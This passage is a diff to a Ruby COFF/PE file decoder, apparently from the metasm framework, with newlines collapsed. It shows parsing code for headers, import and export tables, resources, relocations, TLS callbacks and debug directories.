coff.sect_at_rva(@libname_p) - @libname = coff.decode_strz - end - - if coff.sect_at_rva(@ilt_p) || coff.sect_at_rva(@iat_p) - addrs = [] - while (a_ = coff.decode_xword) != 0 - addrs << a_ - end - - @imports = [] - - ord_mask = 1 << (coff.bitsize-1) - addrs.each { |a| - i = Import.new - if (a & ord_mask) != 0 - i.ordinal = a & (~ord_mask) - else - i.hintname_p = a - if coff.sect_at_rva(a) - i.hint = coff.decode_half - i.name = coff.decode_strz - end - end - @imports << i - } - end - - if coff.sect_at_rva(@iat_p) - @iat = [] - while (a = coff.decode_xword) != 0 - @iat << a - end - end - end - end - - class ResourceDirectory - def decode(coff, edata = coff.curencoded, startptr = edata.ptr) - super(coff, edata) - - @entries = [] - - nrnames = @nr_names if $DEBUG - (@nr_names+@nr_id).times { + class OptionalHeader + decode_hook(:entrypoint) { |coff, ohdr| + coff.bitsize = (ohdr.signature == 'PE+' ? 64 : 32) + } + + # decodes a COFF optional header from coff.cursection + # also decodes directories in coff.directory + def decode(coff) + return set_default_values(coff) if coff.header.size_opthdr == 0 + super(coff) + + nrva = @numrva + if @numrva > DIRECTORIES.length + puts "W: COFF: Invalid directories count #{@numrva}" if $VERBOSE + nrva = DIRECTORIES.length + end + + coff.directory = {} + DIRECTORIES[0, nrva].each { |dir| + rva = coff.decode_word + sz = coff.decode_word + if rva != 0 or sz != 0 + coff.directory[dir] = [rva, sz] + end + } + end + end + + class Symbol + def decode(coff, strtab='') + n0, n1 = coff.decode_word, coff.decode_word + coff.encoded.ptr -= 8 + + super(coff) + + if n0 == 0 and ne = strtab.index(?\0, n1) + @name = strtab[n1...ne] + end + return if @nr_aux == 0 + + @aux = [] + @nr_aux.times { @aux << coff.encoded.read(18) } + end + end + + class Section + def decode(coff) + super(coff) + coff.decode_section_body(self) + end + end + + class RelocObj + def decode(coff) + super(coff) + @sym = coff.symbols[@symidx] + end + end + + class ExportDirectory + # decodes a COFF export table from coff.cursection + def decode(coff) + super(coff) + + if coff.sect_at_rva(@libname_p) + @libname = coff.decode_strz + end + + if coff.sect_at_rva(@func_p) + @exports = [] + addrs = [] + @num_exports.times { addrs << coff.decode_word } + @num_exports.times { |i| + e = Export.new + e.ordinal = i + @ordinal_base + addr = addrs[i] + if addr >= coff.directory['export_table'][0] and addr < coff.directory['export_table'][0] + coff.directory['export_table'][1] and coff.sect_at_rva(addr) + name = coff.decode_strz + e.forwarder_lib, name = name.split('.', 2) + if name[0] == ?# + e.forwarder_ordinal = name[1..-1].to_i + else + e.forwarder_name = name + end + else + e.target = e.target_rva = addr + end + @exports << e + } + end + if coff.sect_at_rva(@names_p) + namep = [] + num_names.times { namep << coff.decode_word } + end + if coff.sect_at_rva(@ord_p) + ords = [] + num_names.times { ords << coff.decode_half } + end + if namep and ords + namep.zip(ords).each { |np, oi| + @exports[oi].name_p = np + if coff.sect_at_rva(np) + @exports[oi].name = coff.decode_strz + end + } + end + end + end + + class ImportDirectory + # decodes all COFF import directories from coff.cursection + def self.decode_all(coff) + ret = [] + loop do + idata = decode(coff) + break if [idata.ilt_p, idata.libname_p].uniq == [0] + ret << idata + end + ret.each { |idata| idata.decode_inner(coff) } + ret + end + + # decode the tables referenced + def decode_inner(coff) + if coff.sect_at_rva(@libname_p) + @libname = coff.decode_strz + end + + if coff.sect_at_rva(@ilt_p) || coff.sect_at_rva(@iat_p) + addrs = [] + while (a_ = coff.decode_xword) != 0 + addrs << a_ + end + + @imports = [] + + ord_mask = 1 << (coff.bitsize-1) + addrs.each { |a| + i = Import.new + if (a & ord_mask) != 0 + i.ordinal = a & (~ord_mask) + else + i.hintname_p = a + if coff.sect_at_rva(a) + i.hint = coff.decode_half + i.name = coff.decode_strz + end + end + @imports << i + } + end + + if coff.sect_at_rva(@iat_p) + @iat = [] + while (a = coff.decode_xword) != 0 + @iat << a + end + end + end + end + + class ResourceDirectory + def decode(coff, edata = coff.curencoded, startptr = edata.ptr) + super(coff, edata) + + @entries = [] + + nrnames = @nr_names if $DEBUG + (@nr_names+@nr_id).times { e = Entry.new e_id = coff.decode_word(edata) e_ptr = coff.decode_word(edata) - if not e_id.kind_of? Integer or not e_ptr.kind_of? Integer - puts 'W: COFF: relocs in the rsrc directory?' if $VERBOSE - next - end - - tmp = edata.ptr - - if (e_id >> 31) == 1 - if $DEBUG - nrnames -= 1 - puts "W: COFF: rsrc has invalid id #{e_id}" if nrnames < 0 - end - e.name_p = e_id & 0x7fff_ffff - edata.ptr = startptr + e.name_p - namelen = coff.decode_half(edata) - e.name_w = edata.read(2*namelen) - if (chrs = e.name_w.unpack('v*')).all? { |c| c >= 0 and c <= 255 } - e.name = chrs.pack('C*') - end - else - if $DEBUG - puts "W: COFF: rsrc has invalid id #{e_id}" if nrnames > 0 - end - e.id = e_id - end - - if (e_ptr >> 31) == 1 # subdir - e.subdir_p = e_ptr & 0x7fff_ffff - if startptr + e.subdir_p >= edata.length - puts 'W: COFF: invalid resource structure: directory too far' if $VERBOSE - else - edata.ptr = startptr + e.subdir_p - e.subdir = ResourceDirectory.new - e.subdir.decode coff, edata, startptr - end - else - e.dataentry_p = e_ptr - edata.ptr = startptr + e.dataentry_p - e.data_p = coff.decode_word(edata) - sz = coff.decode_word(edata) - e.codepage = coff.decode_word(edata) - e.reserved = coff.decode_word(edata) - - if coff.sect_at_rva(e.data_p) - e.data = coff.curencoded.read(sz) - else - puts 'W: COFF: invalid resource body offset' if $VERBOSE - break - end - end - - edata.ptr = tmp - @entries << e - } - end - - def decode_version(coff, lang=nil) - vers = {} - - decode_tllv = lambda { |ed, state| - sptr = ed.ptr - len, vlen, type = coff.decode_half(ed), coff.decode_half(ed), coff.decode_half(ed) - tagname = '' - while c = coff.decode_half(ed) and c != 0 - tagname << (c&255) - end - ed.ptr = (ed.ptr + 3) / 4 * 4 - - case state - when 0 - raise if tagname != 'VS_VERSION_INFO' - dat = ed.read(vlen) - dat.unpack('V*').zip([:signature, :strucversion, :fileversionm, :fileversionl, :prodversionm, :prodversionl, :fileflagsmask, :fileflags, :fileos, :filetype, :filesubtype, :filedatem, :filedatel]) { |v, k| vers[k] = v } - raise if vers[:signature] != 0xfeef04bd - vers.delete :signature - vers[:fileversion] = (vers.delete(:fileversionm) << 32) | vers.delete(:fileversionl) - vers[:prodversion] = (vers.delete(:prodversionm) << 32) | vers.delete(:prodversionl) - vers[:filedate] = (vers.delete(:filedatem) << 32) | vers.delete(:filedatel) - nstate = 1 - when 1 - nstate = case tagname - when 'StringFileInfo'; :strtable - when 'VarFileInfo'; :var - else raise - end - when :strtable - nstate = :str - when :str - val = ed.read(vlen*2).unpack('v*') - val.pop if val[-1] == 0 - val = val.pack('C*') if val.all? { |c_| c_ > 0 and c_ < 256 } - vers[tagname] = val - when :var - val = ed.read(vlen).unpack('V*') - vers[tagname] = val - end - - ed.ptr = (ed.ptr + 3) / 4 * 4 - len = ed.length-sptr if len > ed.length-sptr - while ed.ptr < sptr+len - decode_tllv[ed, nstate] - ed.ptr = (ed.ptr + 3) / 4 * 4 - end - } - - return if not e = @entries.find { |e_| e_.id == TYPE.index('VERSION') } - e = e.subdir.entries.first.subdir - e = e.entries.find { |e_| e_.id == lang } || e.entries.first - ed = EncodedData.new(e.data) - decode_tllv[ed, 0] - - vers - #rescue - end - end - - class RelocationTable - # decodes a relocation table from coff.encoded.ptr - def decode(coff) - super(coff) - len = coff.decode_word - len -= 8 - if len < 0 or len % 2 != 0 - puts "W: COFF: Invalid relocation table length #{len+8}" if $VERBOSE - coff.curencoded.read(len) if len > 0 - @relocs = [] - return - end - - @relocs = coff.curencoded.read(len).unpack(coff.endianness == :big ? 'n*' : 'v*').map { |r| Relocation.new(r&0xfff, r>>12) } - #(len/2).times { @relocs << Relocation.decode(coff) } # tables may be big, this is too slow - end - end - - class TLSDirectory - def decode(coff) - super(coff) - - if coff.sect_at_va(@callback_p) - @callbacks = [] - while (ptr = coff.decode_xword) != 0 - # __stdcall void (*ptr)(void* dllhandle, dword reason, void* reserved) - # (same as dll entrypoint) - @callbacks << (ptr - coff.optheader.image_base) - end - end - end - end - - class LoadConfig - def decode(coff) - super(coff) - - if @sehcount >= 0 and @sehcount < 100 and (@signature == 0x40 or @signature == 0x48) and coff.sect_at_va(@sehtable_p) - @safeseh = [] - @sehcount.times { @safeseh << coff.decode_xword } - end - end - end - - class DelayImportDirectory - def self.decode_all(coff) - ret = [] - loop do - didata = decode(coff) - break if [didata.libname_p, didata.handle_p, didata.iat_p].uniq == [0] - ret << didata - end - ret.each { |didata| didata.decode_inner(coff) } - ret - end - - def decode_inner(coff) - if coff.sect_at_rva(@libname_p) - @libname = coff.decode_strz - end - # TODO - end - end - - class Cor20Header - def decode_all(coff) - if coff.sect_at_rva(@metadata_rva) - @metadata = coff.curencoded.read(@metadata_sz) - end - if coff.sect_at_rva(@resources_rva) - @resources = coff.curencoded.read(@resources_sz) - end - if coff.sect_at_rva(@strongnamesig_rva) - @strongnamesig = coff.curencoded.read(@strongnamesig_sz) - end - if coff.sect_at_rva(@codemgr_rva) - @codemgr = coff.curencoded.read(@codemgr_sz) - end - if coff.sect_at_rva(@vtfixup_rva) - @vtfixup = coff.curencoded.read(@vtfixup_sz) - end - if coff.sect_at_rva(@eatjumps_rva) - @eatjumps = coff.curencoded.read(@eatjumps_sz) - end - if coff.sect_at_rva(@managednativehdr_rva) - @managednativehdr = coff.curencoded.read(@managednativehdr_sz) - end - end - end - - class DebugDirectory - def decode_inner(coff) - case @type - when 'CODEVIEW' - # XXX what is @pointer? - return if not coff.sect_at_rva(@addr) - sig = coff.curencoded.read(4) - case sig - when 'NB09' # CodeView 4.10 - when 'NB10' # external pdb2.0 - @data = NB10.decode(coff) - when 'NB11' # CodeView 5.0 - when 'RSDS' # external pdb7.0 - @data = RSDS.decode(coff) - end - end - end - end - - attr_accessor :cursection - def curencoded - @cursection.encoded - end - - def decode_byte( edata = curencoded) ; edata.decode_imm(:u8, @endianness) end - def decode_half( edata = curencoded) ; edata.decode_imm(:u16, @endianness) end - def decode_word( edata = curencoded) ; edata.decode_imm(:u32, @endianness) end - def decode_xword(edata = curencoded) ; edata.decode_imm((@bitsize == 32 ? :u32 : :u64), @endianness) end - def decode_strz( edata = curencoded) ; super(edata) ; end - - # converts an RVA (offset from base address of file when loaded in memory) to the section containing it using the section table - # updates @cursection and @cursection.encoded.ptr to point to the specified address - # may return self when rva points to the coff header - # returns nil if none match, 0 never matches - def sect_at_rva(rva) - return if not rva or rva <= 0 - if sections and not @sections.empty? - valign = lambda { |l| EncodedData.align_size(l, @optheader.sect_align) } - if s = @sections.find { |s_| s_.virtaddr <= rva and s_.virtaddr + valign[s_.virtsize] > rva } - s.encoded.ptr = rva - s.virtaddr - @cursection = s - elsif rva < @sections.map { |s_| s_.virtaddr }.min - @encoded.ptr = rva - @cursection = self - end - elsif rva <= @encoded.length - @encoded.ptr = rva - @cursection = self - end - end - - def sect_at_va(va) - sect_at_rva(va - @optheader.image_base) - end - - def label_rva(name) - if name.kind_of? Integer - name - elsif s = @sections.find { |s_| s_.encoded.export[name] } - s.virtaddr + s.encoded.export[name] - else - @encoded.export[name] - end - end - - # address -> file offset - # handles LoadedPE - def addr_to_fileoff(addr) - addr -= @load_address ||= @optheader.image_base - return 0 if addr == 0 # sect_at_rva specialcases 0 - if s = sect_at_rva(addr) - if s.respond_to? :virtaddr - addr - s.virtaddr + s.rawaddr - else # header - addr - end - end - end - - # file offset -> memory address - # handles LoadedPE - def fileoff_to_addr(foff) - if s = @sections.find { |s_| s_.rawaddr <= foff and s_.rawaddr + s_.rawsize > foff } - s.virtaddr + foff - s.rawaddr + (@load_address ||= @optheader.image_base) - elsif foff >= 0 and foff < @optheader.headers_size - foff + (@load_address ||= @optheader.image_base) - end - end - - def each_section - if @header.size_opthdr == 0 - @sections.each { |s| - next if not s.encoded - l = new_label(s.name) - s.encoded.add_export(l, 0) - yield s.encoded, l - } - return - end - base = @optheader.image_base - base = 0 if not base.kind_of? Integer - yield @encoded[0, @optheader.headers_size], base - @sections.each { |s| yield s.encoded, base + s.virtaddr } - end - - # decodes the COFF header, optional header, section headers - # marks entrypoint and directories as edata.expord - def decode_header - @cursection ||= self - @encoded.ptr ||= 0 - @sections = [] - @header.decode(self) - optoff = @encoded.ptr - @optheader.decode(self) - decode_symbols if @header.num_sym != 0 and not @header.characteristics.include? 'DEBUG_STRIPPED' - curencoded.ptr = optoff + @header.size_opthdr - decode_sections - if sect_at_rva(@optheader.entrypoint) - curencoded.add_export new_label('entrypoint') - end - (DIRECTORIES - ['certificate_table']).each { |d| - if @directory[d] and sect_at_rva(@directory[d][0]) - curencoded.add_export new_label(d) - end - } - end - - # decode the COFF symbol table (obj only) - def decode_symbols - endptr = @encoded.ptr = @header.ptr_sym + 18*@header.num_sym - strlen = decode_word - @encoded.ptr = endptr - strtab = @encoded.read(strlen) - @encoded.ptr = @header.ptr_sym - @symbols = [] - @header.num_sym.times { - break if @encoded.ptr >= endptr or @encoded.ptr >= @encoded.length - @symbols << Symbol.decode(self, strtab) - # keep the reloc.sym_idx accurate - @symbols.last.nr_aux.times { @symbols << nil } - } - end - - # decode the COFF sections - def decode_sections - @header.num_sect.times { - @sections << Section.decode(self) - } - # now decode COFF object relocations - @sections.each { |s| - next if s.relocnr == 0 - curencoded.ptr = s.relocaddr - s.relocs = [] - s.relocnr.times { s.relocs << RelocObj.decode(self) } - new_label 'pcrel' - s.relocs.each { |r| - case r.type - when 'DIR32' - s.encoded.reloc[r.va] = Metasm::Relocation.new(Expression[r.sym.name], :u32, @endianness) - when 'REL32' - l = new_label('pcrel') - s.encoded.add_export(l, r.va+4) - s.encoded.reloc[r.va] = Metasm::Relocation.new(Expression[r.sym.name, :-, l], :u32, @endianness) - end - } - } if not @header.characteristics.include?('RELOCS_STRIPPED') - symbols.to_a.compact.each { |sym| - next if not sym.sec_nr.kind_of? Integer - next if sym.storage != 'EXTERNAL' and (sym.storage != 'STATIC' or sym.value == 0) - next if not s = @sections[sym.sec_nr-1] - s.encoded.add_export new_label(sym.name), sym.value - } - end - - # decodes a section content (allows simpler LoadedPE override) - def decode_section_body(s) - raw = EncodedData.align_size(s.rawsize, @optheader.file_align) - virt = EncodedData.align_size(s.virtsize, @optheader.sect_align) - virt = raw = s.rawsize if @header.size_opthdr == 0 - s.encoded = @encoded[s.rawaddr, [raw, virt].min] || EncodedData.new - s.encoded.virtsize = virt - end - - # decodes COFF export table from directory - # mark exported names as encoded.export - def decode_exports - if @directory['export_table'] and sect_at_rva(@directory['export_table'][0]) - @export = ExportDirectory.decode(self) - @export.exports.to_a.each { |e| - if e.name and sect_at_rva(e.target) - name = e.name - elsif e.ordinal and sect_at_rva(e.target) - name = "ord_#{@export.libname}_#{e.ordinal}" - end - e.target = curencoded.add_export new_label(name) if name - } - end - end - - # decodes COFF import tables from directory - # mark iat entries as encoded.export - def decode_imports - if @directory['import_table'] and sect_at_rva(@directory['import_table'][0]) - @imports = ImportDirectory.decode_all(self) - iatlen = @bitsize/8 - @imports.each { |id| - if sect_at_rva(id.iat_p) - ptr = curencoded.ptr - id.imports.each { |i| - if i.name - name = new_label i.name - elsif i.ordinal - name = new_label "ord_#{id.libname}_#{i.ordinal}" - end - if name - i.target ||= name - r = Metasm::Relocation.new(Expression[name], "u#@bitsize".to_sym, @endianness) - curencoded.reloc[ptr] = r - curencoded.add_export new_label('iat_'+name), ptr, true - end - ptr += iatlen - } - end - } - end - end - - # decodes resources from directory - def decode_resources - if @directory['resource_table'] and sect_at_rva(@directory['resource_table'][0]) - @resource = ResourceDirectory.decode(self) - end - end - - # decode the VERSION information from the resources (file version, os, copyright etc) - def decode_version(lang=0x409) - decode_resources if not resource - resource.decode_version(self, lang) - end - - # decodes certificate table - def decode_certificates - if ct = @directory['certificate_table'] - @certificates = [] - @cursection = self - @encoded.ptr = ct[0] - off_end = ct[0]+ct[1] - while @encoded.ptr < off_end - certlen = decode_word - certrev = decode_half - certtype = decode_half - certdat = @encoded.read(certlen) - @certificates << [certrev, certtype, certdat] - end - end - end - - # decode the COM Cor20 header - def decode_com - if @directory['com_runtime'] and sect_at_rva(@directory['com_runtime'][0]) - @com_header = Cor20Header.decode(self) - if sect_at_rva(@com_header.entrypoint) - curencoded.add_export new_label('com_entrypoint') - end - @com_header.decode_all(self) - end - end - - # decode COFF relocation tables from directory - def decode_relocs - if @directory['base_relocation_table'] and sect_at_rva(@directory['base_relocation_table'][0]) - end_ptr = curencoded.ptr + @directory['base_relocation_table'][1] - @relocations = [] - while curencoded.ptr < end_ptr - @relocations << RelocationTable.decode(self) - end - - # interpret as EncodedData relocations - relocfunc = ('decode_reloc_' << @header.machine.downcase).to_sym - if not respond_to? relocfunc - puts "W: COFF: unsupported relocs for architecture #{@header.machine}" if $VERBOSE - return - end - @relocations.each { |rt| - rt.relocs.each { |r| - if s = sect_at_rva(rt.base_addr + r.offset) - e, p = s.encoded, s.encoded.ptr - rel = send(relocfunc, r) - e.reloc[p] = rel if rel - end - } - } - end - end - - # decodes an I386 COFF relocation pointing to encoded.ptr - def decode_reloc_i386(r) - case r.type - when 'ABSOLUTE' - when 'HIGHLOW' - addr = decode_word - if s = sect_at_va(addr) - label = label_at(s.encoded, s.encoded.ptr, "xref_#{Expression[addr]}") - Metasm::Relocation.new(Expression[label], :u32, @endianness) - end - when 'DIR64' - addr = decode_xword - if s = sect_at_va(addr) - label = label_at(s.encoded, s.encoded.ptr, "xref_#{Expression[addr]}") - Metasm::Relocation.new(Expression[label], :u64, @endianness) - end - else puts "W: COFF: Unsupported i386 relocation #{r.inspect}" if $VERBOSE - end - end - - def decode_debug - if dd = @directory['debug'] and sect_at_rva(dd[0]) - @debug = [] - p0 = curencoded.ptr - while curencoded.ptr < p0 + dd[1] - @debug << DebugDirectory.decode(self) - end - @debug.each { |dbg| dbg.decode_inner(self) } - end - end - - # decode TLS directory, including tls callback table - def decode_tls - if @directory['tls_table'] and sect_at_rva(@directory['tls_table'][0]) - @tls = TLSDirectory.decode(self) - if s = sect_at_va(@tls.callback_p) - s.encoded.add_export 'tls_callback_table' - @tls.callbacks.each_with_index { |cb, i| - @tls.callbacks[i] = curencoded.add_export "tls_callback_#{i}" if sect_at_rva(cb) - } - end - end - end - - def decode_loadconfig - if lc = @directory['load_config'] and sect_at_rva(lc[0]) - @loadconfig = LoadConfig.decode(self) - end - end - - def decode_delayimports - if di = @directory['delay_import_table'] and sect_at_rva(di[0]) - @delayimports = DelayImportDirectory.decode_all(self) - end - end - - - # decodes a COFF file (headers/exports/imports/relocs/sections) - # starts at encoded.ptr - def decode - decode_header - decode_exports - decode_imports - decode_resources - decode_certificates - decode_debug - decode_tls - decode_loadconfig - decode_delayimports - decode_com - decode_relocs unless nodecode_relocs or ENV['METASM_NODECODE_RELOCS'] # decode relocs last - end - - # returns a metasm CPU object corresponding to +header.machine+ - def cpu_from_headers - case @header.machine - when 'I386'; Ia32.new - when 'AMD64'; X86_64.new - when 'R4000'; MIPS.new(:little) - else raise "unknown cpu #{@header.machine}" - end - end - - # returns an array including the PE entrypoint and the exported functions entrypoints - # TODO filter out exported data, include safeseh ? - def get_default_entrypoints - ep = [] - ep.concat @tls.callbacks.to_a if tls - ep << (@optheader.image_base + label_rva(@optheader.entrypoint)) - @export.exports.to_a.each { |e| - next if e.forwarder_lib or not e.target - ep << (@optheader.image_base + label_rva(e.target)) - } if export - ep - end - - def dump_section_header(addr, edata) - s = @sections.find { |s_| s_.virtaddr == addr-@optheader.image_base } - s ? "\n.section #{s.name.inspect} base=#{Expression[addr]}" : - addr == @optheader.image_base ? "// exe header at #{Expression[addr]}" : super(addr, edata) - end - - # returns an array of [name, addr, length, info] - def section_info - [['header', @optheader.image_base, @optheader.headers_size, nil]] + - @sections.map { |s| - [s.name, @optheader.image_base + s.virtaddr, s.virtsize, s.characteristics.join(',')] - } - end + if not e_id.kind_of? Integer or not e_ptr.kind_of? Integer + puts 'W: COFF: relocs in the rsrc directory?' if $VERBOSE + next + end + + tmp = edata.ptr + + if (e_id >> 31) == 1 + if $DEBUG + nrnames -= 1 + puts "W: COFF: rsrc has invalid id #{e_id}" if nrnames < 0 + end + e.name_p = e_id & 0x7fff_ffff + edata.ptr = startptr + e.name_p + namelen = coff.decode_half(edata) + e.name_w = edata.read(2*namelen) + if (chrs = e.name_w.unpack('v*')).all? { |c| c >= 0 and c <= 255 } + e.name = chrs.pack('C*') + end + else + if $DEBUG + puts "W: COFF: rsrc has invalid id #{e_id}" if nrnames > 0 + end + e.id = e_id + end + + if (e_ptr >> 31) == 1 # subdir + e.subdir_p = e_ptr & 0x7fff_ffff + if startptr + e.subdir_p >= edata.length + puts 'W: COFF: invalid resource structure: directory too far' if $VERBOSE + else + edata.ptr = startptr + e.subdir_p + e.subdir = ResourceDirectory.new + e.subdir.decode coff, edata, startptr + end + else + e.dataentry_p = e_ptr + edata.ptr = startptr + e.dataentry_p + e.data_p = coff.decode_word(edata) + sz = coff.decode_word(edata) + e.codepage = coff.decode_word(edata) + e.reserved = coff.decode_word(edata) + + if coff.sect_at_rva(e.data_p) + e.data = coff.curencoded.read(sz) + else + puts 'W: COFF: invalid resource body offset' if $VERBOSE + break + end + end + + edata.ptr = tmp + @entries << e + } + end + + def decode_version(coff, lang=nil) + vers = {} + + decode_tllv = lambda { |ed, state| + sptr = ed.ptr + len, vlen, type = coff.decode_half(ed), coff.decode_half(ed), coff.decode_half(ed) + tagname = '' + while c = coff.decode_half(ed) and c != 0 + tagname << (c&255) + end + ed.ptr = (ed.ptr + 3) / 4 * 4 + + case state + when 0 + raise if tagname != 'VS_VERSION_INFO' + dat = ed.read(vlen) + dat.unpack('V*').zip([:signature, :strucversion, :fileversionm, :fileversionl, :prodversionm, :prodversionl, :fileflagsmask, :fileflags, :fileos, :filetype, :filesubtype, :filedatem, :filedatel]) { |v, k| vers[k] = v } + raise if vers[:signature] != 0xfeef04bd + vers.delete :signature + vers[:fileversion] = (vers.delete(:fileversionm) << 32) | vers.delete(:fileversionl) + vers[:prodversion] = (vers.delete(:prodversionm) << 32) | vers.delete(:prodversionl) + vers[:filedate] = (vers.delete(:filedatem) << 32) | vers.delete(:filedatel) + nstate = 1 + when 1 + nstate = case tagname + when 'StringFileInfo'; :strtable + when 'VarFileInfo'; :var + else raise + end + when :strtable + nstate = :str + when :str + val = ed.read(vlen*2).unpack('v*') + val.pop if val[-1] == 0 + val = val.pack('C*') if val.all? { |c_| c_ > 0 and c_ < 256 } + vers[tagname] = val + when :var + val = ed.read(vlen).unpack('V*') + vers[tagname] = val + end + + ed.ptr = (ed.ptr + 3) / 4 * 4 + len = ed.length-sptr if len > ed.length-sptr + while ed.ptr < sptr+len + decode_tllv[ed, nstate] + ed.ptr = (ed.ptr + 3) / 4 * 4 + end + } + + return if not e = @entries.find { |e_| e_.id == TYPE.index('VERSION') } + e = e.subdir.entries.first.subdir + e = e.entries.find { |e_| e_.id == lang } || e.entries.first + ed = EncodedData.new(e.data) + decode_tllv[ed, 0] + + vers + #rescue + end + end + + class RelocationTable + # decodes a relocation table from coff.encoded.ptr + def decode(coff) + super(coff) + len = coff.decode_word + len -= 8 + if len < 0 or len % 2 != 0 + puts "W: COFF: Invalid relocation table length #{len+8}" if $VERBOSE + coff.curencoded.read(len) if len > 0 + @relocs = [] + return + end + + @relocs = coff.curencoded.read(len).unpack(coff.endianness == :big ? 'n*' : 'v*').map { |r| Relocation.new(r&0xfff, r>>12) } + #(len/2).times { @relocs << Relocation.decode(coff) } # tables may be big, this is too slow + end + end + + class TLSDirectory + def decode(coff) + super(coff) + + if coff.sect_at_va(@callback_p) + @callbacks = [] + while (ptr = coff.decode_xword) != 0 + # __stdcall void (*ptr)(void* dllhandle, dword reason, void* reserved) + # (same as dll entrypoint) + @callbacks << (ptr - coff.optheader.image_base) + end + end + end + end + + class LoadConfig + def decode(coff) + super(coff) + + if @sehcount >= 0 and @sehcount < 100 and (@signature == 0x40 or @signature == 0x48) and coff.sect_at_va(@sehtable_p) + @safeseh = [] + @sehcount.times { @safeseh << coff.decode_xword } + end + end + end + + class DelayImportDirectory + def self.decode_all(coff) + ret = [] + loop do + didata = decode(coff) + break if [didata.libname_p, didata.handle_p, didata.iat_p].uniq == [0] + ret << didata + end + ret.each { |didata| didata.decode_inner(coff) } + ret + end + + def decode_inner(coff) + if coff.sect_at_rva(@libname_p) + @libname = coff.decode_strz + end + # TODO + end + end + + class Cor20Header + def decode_all(coff) + if coff.sect_at_rva(@metadata_rva) + @metadata = coff.curencoded.read(@metadata_sz) + end + if coff.sect_at_rva(@resources_rva) + @resources = coff.curencoded.read(@resources_sz) + end + if coff.sect_at_rva(@strongnamesig_rva) + @strongnamesig = coff.curencoded.read(@strongnamesig_sz) + end + if coff.sect_at_rva(@codemgr_rva) + @codemgr = coff.curencoded.read(@codemgr_sz) + end + if coff.sect_at_rva(@vtfixup_rva) + @vtfixup = coff.curencoded.read(@vtfixup_sz) + end + if coff.sect_at_rva(@eatjumps_rva) + @eatjumps = coff.curencoded.read(@eatjumps_sz) + end + if coff.sect_at_rva(@managednativehdr_rva) + @managednativehdr = coff.curencoded.read(@managednativehdr_sz) + end + end + end + + class DebugDirectory + def decode_inner(coff) + case @type + when 'CODEVIEW' + # XXX what is @pointer? + return if not coff.sect_at_rva(@addr) + sig = coff.curencoded.read(4) + case sig + when 'NB09' # CodeView 4.10 + when 'NB10' # external pdb2.0 + @data = NB10.decode(coff) + when 'NB11' # CodeView 5.0 + when 'RSDS' # external pdb7.0 + @data = RSDS.decode(coff) + end + end + end + end + + attr_accessor :cursection + def curencoded + @cursection.encoded + end + + def decode_byte( edata = curencoded) ; edata.decode_imm(:u8, @endianness) end + def decode_half( edata = curencoded) ; edata.decode_imm(:u16, @endianness) end + def decode_word( edata = curencoded) ; edata.decode_imm(:u32, @endianness) end + def decode_xword(edata = curencoded) ; edata.decode_imm((@bitsize == 32 ? :u32 : :u64), @endianness) end + def decode_strz( edata = curencoded) ; super(edata) ; end + + # converts an RVA (offset from base address of file when loaded in memory) to the section containing it using the section table + # updates @cursection and @cursection.encoded.ptr to point to the specified address + # may return self when rva points to the coff header + # returns nil if none match, 0 never matches + def sect_at_rva(rva) + return if not rva or rva <= 0 + if sections and not @sections.empty? + valign = lambda { |l| EncodedData.align_size(l, @optheader.sect_align) } + if s = @sections.find { |s_| s_.virtaddr <= rva and s_.virtaddr + valign[s_.virtsize] > rva } + s.encoded.ptr = rva - s.virtaddr + @cursection = s + elsif rva < @sections.map { |s_| s_.virtaddr }.min + @encoded.ptr = rva + @cursection = self + end + elsif rva <= @encoded.length + @encoded.ptr = rva + @cursection = self + end + end + + def sect_at_va(va) + sect_at_rva(va - @optheader.image_base) + end + + def label_rva(name) + if name.kind_of? Integer + name + elsif s = @sections.find { |s_| s_.encoded.export[name] } + s.virtaddr + s.encoded.export[name] + else + @encoded.export[name] + end + end + + # address -> file offset + # handles LoadedPE + def addr_to_fileoff(addr) + addr -= @load_address ||= @optheader.image_base + return 0 if addr == 0 # sect_at_rva specialcases 0 + if s = sect_at_rva(addr) + if s.respond_to? :virtaddr + addr - s.virtaddr + s.rawaddr + else # header + addr + end + end + end + + # file offset -> memory address + # handles LoadedPE + def fileoff_to_addr(foff) + if s = @sections.find { |s_| s_.rawaddr <= foff and s_.rawaddr + s_.rawsize > foff } + s.virtaddr + foff - s.rawaddr + (@load_address ||= @optheader.image_base) + elsif foff >= 0 and foff < @optheader.headers_size + foff + (@load_address ||= @optheader.image_base) + end + end + + def each_section + if @header.size_opthdr == 0 + @sections.each { |s| + next if not s.encoded + l = new_label(s.name) + s.encoded.add_export(l, 0) + yield s.encoded, l + } + return + end + base = @optheader.image_base + base = 0 if not base.kind_of? Integer + yield @encoded[0, @optheader.headers_size], base + @sections.each { |s| yield s.encoded, base + s.virtaddr } + end + + # decodes the COFF header, optional header, section headers + # marks entrypoint and directories as edata.expord + def decode_header + @cursection ||= self + @encoded.ptr ||= 0 + @sections = [] + @header.decode(self) + optoff = @encoded.ptr + @optheader.decode(self) + decode_symbols if @header.num_sym != 0 and not @header.characteristics.include? 'DEBUG_STRIPPED' + curencoded.ptr = optoff + @header.size_opthdr + decode_sections + if sect_at_rva(@optheader.entrypoint) + curencoded.add_export new_label('entrypoint') + end + (DIRECTORIES - ['certificate_table']).each { |d| + if @directory[d] and sect_at_rva(@directory[d][0]) + curencoded.add_export new_label(d) + end + } + end + + # decode the COFF symbol table (obj only) + def decode_symbols + endptr = @encoded.ptr = @header.ptr_sym + 18*@header.num_sym + strlen = decode_word + @encoded.ptr = endptr + strtab = @encoded.read(strlen) + @encoded.ptr = @header.ptr_sym + @symbols = [] + @header.num_sym.times { + break if @encoded.ptr >= endptr or @encoded.ptr >= @encoded.length + @symbols << Symbol.decode(self, strtab) + # keep the reloc.sym_idx accurate + @symbols.last.nr_aux.times { @symbols << nil } + } + end + + # decode the COFF sections + def decode_sections + @header.num_sect.times { + @sections << Section.decode(self) + } + # now decode COFF object relocations + @sections.each { |s| + next if s.relocnr == 0 + curencoded.ptr = s.relocaddr + s.relocs = [] + s.relocnr.times { s.relocs << RelocObj.decode(self) } + new_label 'pcrel' + s.relocs.each { |r| + case r.type + when 'DIR32' + s.encoded.reloc[r.va] = Metasm::Relocation.new(Expression[r.sym.name], :u32, @endianness) + when 'REL32' + l = new_label('pcrel') + s.encoded.add_export(l, r.va+4) + s.encoded.reloc[r.va] = Metasm::Relocation.new(Expression[r.sym.name, :-, l], :u32, @endianness) + end + } + } if not @header.characteristics.include?('RELOCS_STRIPPED') + symbols.to_a.compact.each { |sym| + next if not sym.sec_nr.kind_of? Integer + next if sym.storage != 'EXTERNAL' and (sym.storage != 'STATIC' or sym.value == 